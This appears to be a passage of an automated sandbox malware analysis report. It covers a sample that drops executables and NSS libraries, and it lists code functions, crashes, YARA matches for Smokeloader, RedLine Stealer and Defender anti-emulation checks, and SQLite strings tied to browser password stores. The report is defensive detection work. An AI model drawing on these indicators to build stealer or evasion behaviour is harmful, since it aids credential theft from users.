Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00646117 5_2_00646117
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00611267 5_2_00611267
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0064B2B7 5_2_0064B2B7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006363DB 5_2_006363DB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00616457 5_2_00616457
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006364EB 5_2_006364EB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006375BA 5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0061F667 5_2_0061F667
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006436E7 5_2_006436E7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006156A7 5_2_006156A7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00626739 5_2_00626739
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006137D7 5_2_006137D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00616A17 5_2_00616A17
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00630AE7 5_2_00630AE7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00614BD7 5_2_00614BD7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00618C07 5_2_00618C07
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00635F55 5_2_00635F55
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0064AF97 5_2_0064AF97
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BAB10 8_2_043BAB10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC2ECC0 9_2_6CC2ECC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8ECD0 9_2_6CC8ECD0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC3AC60 9_2_6CC3AC60
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF6C00 9_2_6CCF6C00
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0AC30 9_2_6CD0AC30
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDBCDC0 9_2_6CDBCDC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC6D90 9_2_6CCC6D90
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC34DB0 9_2_6CC34DB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD5AD50 9_2_6CD5AD50
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFED70 9_2_6CCFED70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDB8D20 9_2_6CDB8D20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC3AEC0 9_2_6CC3AEC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCD0EC0 9_2_6CCD0EC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB6E90 9_2_6CCB6E90
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCEE70 9_2_6CCCEE70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD10E20 9_2_6CD10E20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0EFF0 9_2_6CD0EFF0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC30FE0 9_2_6CC30FE0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD78FB0 9_2_6CD78FB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC3EFB0 9_2_6CC3EFB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9EF40 9_2_6CC9EF40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF2F70 9_2_6CCF2F70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC36F10 9_2_6CC36F10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70F20 9_2_6CD70F20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD1C8C0 9_2_6CD1C8C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD368E0 9_2_6CD368E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD04840 9_2_6CD04840
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC80820 9_2_6CC80820
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCBA820 9_2_6CCBA820
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD4C9E0 9_2_6CD4C9E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC649F0 9_2_6CC649F0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC09A0 9_2_6CCC09A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCEA9A0 9_2_6CCEA9A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF09B0 9_2_6CCF09B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC68960 9_2_6CC68960
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC86900 9_2_6CC86900
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCAEA80 9_2_6CCAEA80
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCACA70 9_2_6CCACA70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCDEA00 9_2_6CCDEA00
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE8A30 9_2_6CCE8A30
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD36BE0 9_2_6CD36BE0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCD0BA0 9_2_6CCD0BA0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC764D0 9_2_6CC764D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCA4D0 9_2_6CCCA4D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD5A480 9_2_6CD5A480
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC48460 9_2_6CC48460
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC94420 9_2_6CC94420
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCBA430 9_2_6CCBA430
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFA5E0 9_2_6CCFA5E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCBE5F0 9_2_6CCBE5F0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC245B0 9_2_6CC245B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD78550 9_2_6CD78550
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC88540 9_2_6CC88540
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD34540 9_2_6CD34540
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC92560 9_2_6CC92560
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCD0570 9_2_6CCD0570
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC546D0 9_2_6CC546D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8E6E0 9_2_6CC8E6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCE6E0 9_2_6CCCE6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8C650 9_2_6CC8C650
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC5A7D0 9_2_6CC5A7D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB0700 9_2_6CCB0700
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC28090 9_2_6CC28090
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0C0B0 9_2_6CD0C0B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC400B0 9_2_6CC400B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC7E070 9_2_6CC7E070
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFC000 9_2_6CCFC000
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF8010 9_2_6CCF8010
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC301E0 9_2_6CC301E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC98140 9_2_6CC98140
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD14130 9_2_6CD14130
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCA6130 9_2_6CCA6130
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDB62C0 9_2_6CDB62C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD022A0 9_2_6CD022A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFE2B0 9_2_6CCFE2B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC8250 9_2_6CCC8250
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB8260 9_2_6CCB8260
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFA210 9_2_6CCFA210
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD08220 9_2_6CD08220
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC843E0 9_2_6CC843E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC623A0 9_2_6CC623A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8E3B0 9_2_6CC8E3B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC38340 9_2_6CC38340
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD72370 9_2_6CD72370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC32370 9_2_6CC32370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD4C360 9_2_6CD4C360
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC6370 9_2_6CCC6370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCA2320 9_2_6CCA2320
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6DCD0 9_2_6CD6DCD0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\DGHIECGCBKFH\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\DGHIECGCBKFH\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 0061F807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 00618A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CDBD930 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CDB09D0 appears 229 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CC53620 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CDBDAE0 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CC59B10 appears 51 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\A247.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548
Sample file is different than original file name gathered from version info
Source: 3.exe, 00000000.00000000.1980211482.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFilezera2 vs 3.exe
Source: 3.exe Binary or memory string: OriginalFilenamesFilezera2 vs 3.exe
Uses 32bit PE files
Source: 3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/35@5/9
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC90300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 9_2_6CC90300
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D52619 CreateToolhelp32Snapshot,Module32First, 0_2_02D52619
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042B20E CoCreateInstance, 5_2_0042B20E
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rcjjrra Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6204
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A247.tmp Jump to behavior
Source: 3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\5358.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.9.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.9.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.9.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.9.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: kat2225.tmp, kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.9.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: A247.exe, 00000005.00000003.2386153562.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2385765464.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2411021504.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2860477821.000000000089E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000087C000.00000004.00000020.00020000.00000000.sdmp, BKFBAK.9.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
